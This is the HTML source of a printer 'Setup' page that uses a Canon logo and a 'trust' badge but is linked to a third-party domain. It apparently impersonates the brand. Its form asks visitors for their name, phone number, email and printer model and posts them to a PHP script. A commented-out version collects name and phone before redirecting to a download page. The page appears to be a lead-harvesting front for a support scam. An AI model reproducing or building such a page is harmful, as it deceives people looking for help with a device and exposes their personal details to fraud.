<!DOCTYPE html>
<html style="font-size: 16px;" lang="en"><head>
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta charset="utf-8">
    <meta name="keywords" content="">
    <meta name="description" content="">
    <META NAME="ROBOTS" CONTENT="NOINDEX, NOFOLLOW">
    <title>Setup</title>
    <link rel="stylesheet" href="canon.css" media="screen">
<link rel="stylesheet" href="Setup.css" media="screen">
    <script class="u-script" type="text/javascript" src="jquery.js" defer=""></script>
    <script class="u-script" type="text/javascript" src="canon.js" defer=""></script>
    <link id="u-theme-google-font" rel="stylesheet" href="https://fonts.googleapis.com/css?family=Roboto:100,100i,300,300i,400,400i,500,500i,700,700i,900,900i%7COpen+Sans:300,300i,400,400i,500,500i,600,600i,700,700i,800,800i">
    

    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
    
    <script type="application/ld+json">{
		"@context": "http://schema.org",
		"@type": "Organization",
		"name": ""
}</script>
    <meta name="theme-color" content="#478ac9">
    <meta property="og:title" content="Setup">
    <meta property="og:type" content="website">
  <meta data-intl-tel-input-cdn-path="intlTelInput/">

<style>
  .u-section-1 .u-group-3
  {
    box-shadow: 3px 3px 5px 0 rgba(0,0,0,0.4);
  }

 
  .u-section-1 .u-group-4
  {
    background: #eeeeee !important;
  }
</style>


</head>
  <body class="u-body u-xl-mode" data-lang="en">
    <section class="u-clearfix u-white u-section-1" id="sec-61d1" style="background-color: #f2f2f2 !important;">
      <div class="u-clearfix u-sheet u-sheet-1">
        <div class="u-container-style u-expanded-width-xs u-grey-5 u-group u-shape-rectangle u-group-1">
          <div class="u-container-layout u-valign-top-sm u-valign-top-xs u-container-layout-1">
            <div class="u-border-3 u-container-style u-expanded-width-xs u-group u-white u-group-2" style="border: none;">
              <div class="u-container-layout u-container-layout-2">
                <img class="u-image u-image-contain u-image-default u-image-1" src="images/Canon-logo.jpg" alt="" data-image-width="5974" data-image-height="3000">
                <img class="u-image u-image-contain u-image-default u-image-2" src="images/trust.png" alt="" data-image-width="1024" data-image-height="160">
                <p class="u-text u-text-default u-text-1">
                  <a class="u-active-none u-border-none u-btn u-button-link u-button-style u-hover-none u-none u-text-palette-3-dark-2 u-btn-1" href="https://printereselectproduct.com/canon-i-reviews.html">Return to Top</a>
                </p><span class="u-file-icon u-icon u-icon-circle u-palette-3-dark-2 u-icon-1"><img src="images/130882-3a83ba3e.png" alt=""></span>
                <div class="u-container-style u-grey-10 u-group u-shape-rectangle u-group-3">
                  <div class="u-container-layout u-valign-middle-lg u-valign-middle-md u-valign-middle-sm u-valign-middle-xl u-container-layout-3">
                    <p class="u-text u-text-body-color u-text-default u-text-2">Select Product Name or Model Number</p>
                  </div>
                </div>
                <p class="u-text u-text-default-lg u-text-default-xl u-text-3">Search for your product name or select from the list</p>
                <div class="u-border-1 u-border-grey-15 u-container-style u-group u-palette-4-light-2 u-group-4">
                  <div class="u-container-layout u-container-layout-4">
                    <div class="u-carousel u-carousel-duration-250 u-carousel-fade u-form u-form-1" data-interval="0" data-u-ride="false">
                      
                      
                      <!-- <form action="./scripts/form-e2d6-61d1.php" class="u-clearfix u-form-spacing-9 u-form-vertical u-inner-form" style="padding: 0px;" source="customphp" redirect="true" redirect-address="Downloadsetup.html" rel="noreferrer">
                        <div class="u-carousel-inner" role="listbox">
                          <div class="u-active u-carousel-item u-form-step u-slide">
                            <div class="u-form-group u-form-name u-label-none">
                              <label for="name-558c" class="u-label">Name</label>
                              <input type="text" placeholder="Model Example: TS9030" id="name-558c" name="name" class="u-input u-input-rectangle u-input-1" required="">
                            </div>
                          </div>
                          <div class="u-carousel-item u-form-step u-slide">
                            <div class="u-form-group u-form-name u-label-none u-form-group-2">
                              <label for="name-8202" class="u-label">Name</label>
                              <input type="text" placeholder="Enter your Name" id="name-8202" name="name" class="u-input u-input-rectangle u-input-2" required="">
                            </div>
                            <div class="u-form-group u-form-phone u-label-none u-form-group-3">
                              <label for="phone-3646" class="u-label">Phone</label>
                              <input type="tel"  placeholder="Enter your phone (e.g. +14155552675)" id="phone-3646" name="phone" class="u-input u-input-rectangle u-input-3" required="">
                            </div>
                          </div>
                        </div>
                        <div class="u-align-center u-form-group u-form-submit u-label-none">
                          <a href="Setup.html#" class="u-border-none u-btn u-btn-step u-btn-step-prev" style="background-color: #454545; border: solid 1px #454545; font-size: 100%; padding: 0.2em 1em;">Back</a>
                          <a href="Setup.html#" class="u-border-none u-btn u-btn-step u-btn-step-next" style="background-color: #454545; border: solid 1px #454545; font-size: 100%; padding: 0.2em 1em;">Next</a>
                          <a href="Setup.html#" class="u-border-none u-btn u-btn-submit u-button-style" style="background-color: #454545; border: solid 1px #454545; font-size: 100%; padding: 0.2em 1em;">Submit</a>
                          <input type="submit" value="submit" class="u-form-control-hidden">
                        </div>
                        <div class="u-form-send-message u-form-send-success">Processing...</div>
                        <div class="u-form-send-error u-form-send-message">Unable to process try again.</div>
                        <input type="hidden" value="" name="recaptchaResponse">
                      </form> -->

                      <form action="action_page.php" method="POST">
                        <input type="text" id="input" name="name" placeholder="Name" style="width: 100%;   margin-bottom: 7px;" required>
                        <input type="text" id="input" name="phn" placeholder="Enter your phone (e.g. +14155552675)" style="width: 100%;   margin-bottom: 7px;" required>
                        <input type="text" id="input" name="email" placeholder="Email" style="width: 100%;   margin-bottom: 7px;" required>
                  <input type="text" id="input" name="modenumber" placeholder="Model Example: TS9030" style="width: 100%;   margin-bottom: 7px;" required>
                  <input type="submit" value="Go" name="submit" id="submitbtn" style="color:#fff; background-color: #454545; border: solid 1px #454545; font-size: 100%; padding: 0.2em 1em;">
                </form>



                    </div>
                    <!-- <p style="text-align: center;">
                      <a href="#" style="font-size: 14px; border-bottom: 1px solid;"><i class="fa fa-question-circle" aria-hidden="true"></i> Where to find your product name</a>
                    </p>
                     -->
                    
                  </div>
                </div>


<div class="u-container-layout u-container-layout-4">
  <div class="u-border-2 u-border-grey-25 u-container-style u-group u-white u-group-5">
    <div class="u-container-layout u-container-layout-5">
      <div class="u-clearfix u-group-elements u-group-elements-1">
        <img class="u-expanded-width u-image u-image-contain u-image-default u-preserve-proportions u-image-4" src="images/ts6330.jpeg" alt="" data-image-width="250" data-image-height="165">
        <p class="u-text u-text-5">TS6330</p>
      </div>
    </div>
  </div>
  <div class="u-border-2 u-border-grey-25 u-container-style u-group u-white u-group-6">
    <div class="u-container-layout u-container-layout-6">
      <div class="u-align-center u-clearfix u-group-elements u-group-elements-2">
        <img class="u-expanded-width u-image u-image-contain u-image-default u-preserve-proportions u-image-5" src="images/xk60.jpeg" alt="" data-image-width="250" data-image-height="165">
        <p class="u-text u-text-default u-text-6">KK60</p>
      </div>
    </div>
  </div>
  <div class="u-border-2 u-border-grey-25 u-container-style u-group u-white u-group-7">
    <div class="u-container-layout u-container-layout-7">
      <div class="u-align-center u-clearfix u-group-elements u-group-elements-3">
        <img class="u-expanded-width u-image u-image-contain u-image-default u-preserve-proportions u-image-6" src="images/ts7330.jpeg" alt="" data-image-width="250" data-image-height="165">
        <p class="u-text u-text-default u-text-7">TS7030</p>
      </div>
    </div>
  </div>
  <div class="u-border-2 u-border-grey-25 u-container-style u-group u-white u-group-8">
    <div class="u-container-layout u-container-layout-8">
      <div class="u-align-center u-clearfix u-group-elements u-group-elements-4">
        <img class="u-expanded-width u-image u-image-contain u-image-default u-preserve-proportions u-image-7" src="images/ts8300.jpeg" alt="" data-image-width="250" data-image-height="165">
        <p class="u-text u-text-default u-text-8">TS8370</p>
      </div>
    </div>
  </div>
</div>


              </div>
            </div>
          </div>
        </div>
      </div>
    </section>
    

  <section class="u-black u-clearfix u-container-style u-dialog-block u-opacity u-opacity-70 u-valign-middle-xs u-dialog-section-4" id="sec-fb0d">
      <div class="u-align-center-xs u-container-style u-dialog u-white u-dialog-1">
        <div class="u-container-layout u-container-layout-1">
          <img class="u-image u-image-contain u-image-default u-image-1" src="images/top.png" alt="" data-image-width="1024" data-image-height="579">
        </div><button class="u-dialog-close-button u-icon u-text-grey-40 u-icon-1"><svg class="u-svg-link" preserveAspectRatio="xMidYMin slice" viewBox="0 0 16 16" style=""><use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="#svg-efe9"></use></svg><svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1" xml:space="preserve" class="u-svg-content" viewBox="0 0 16 16" x="0px" y="0px" id="svg-efe9"><rect x="7" y="0" transform="matrix(0.7071 -0.7071 0.7071 0.7071 -3.3138 8.0002)" width="2" height="16"></rect><rect x="0" y="7" transform="matrix(0.7071 -0.7071 0.7071 0.7071 -3.3138 8.0002)" width="16" height="2"></rect></svg></button>
      </div>
    </section><style>.u-dialog-section-4 .u-dialog-1 {
  width: 340px;
  min-height: 382px;
  height: auto;
  margin: 60px auto;
}

.u-dialog-section-4 .u-container-layout-1 {
  padding: 0 10px;
}

.u-dialog-section-4 .u-image-1 {
  width: 320px;
  height: 381px;
  margin: 1px auto 0;
}

.u-dialog-section-4 .u-icon-1 {
  width: 20px;
  height: 20px;
}

@media (max-width: 1199px) {
  .u-dialog-section-4 .u-dialog-1 {
    width: 512px;
    min-height: 424px;
    margin-top: 330px;
    margin-left: calc(((100% - 940px) / 2) + 181px);
  }
}

@media (max-width: 991px) {
  .u-dialog-section-4 .u-dialog-1 {
    width: 444px;
    margin-left: auto;
  }
}

@media (max-width: 767px) {
  .u-dialog-section-4 .u-dialog-1 {
    width: 350px;
  }

  .u-dialog-section-4 .u-image-1 {
    width: 330px;
  }
}

@media (max-width: 575px) {
  .u-dialog-section-4 .u-dialog-1 {
    width: 340px;
  }

  .u-dialog-section-4 .u-image-1 {
    width: 320px;
  }
}</style>
    



</body></html>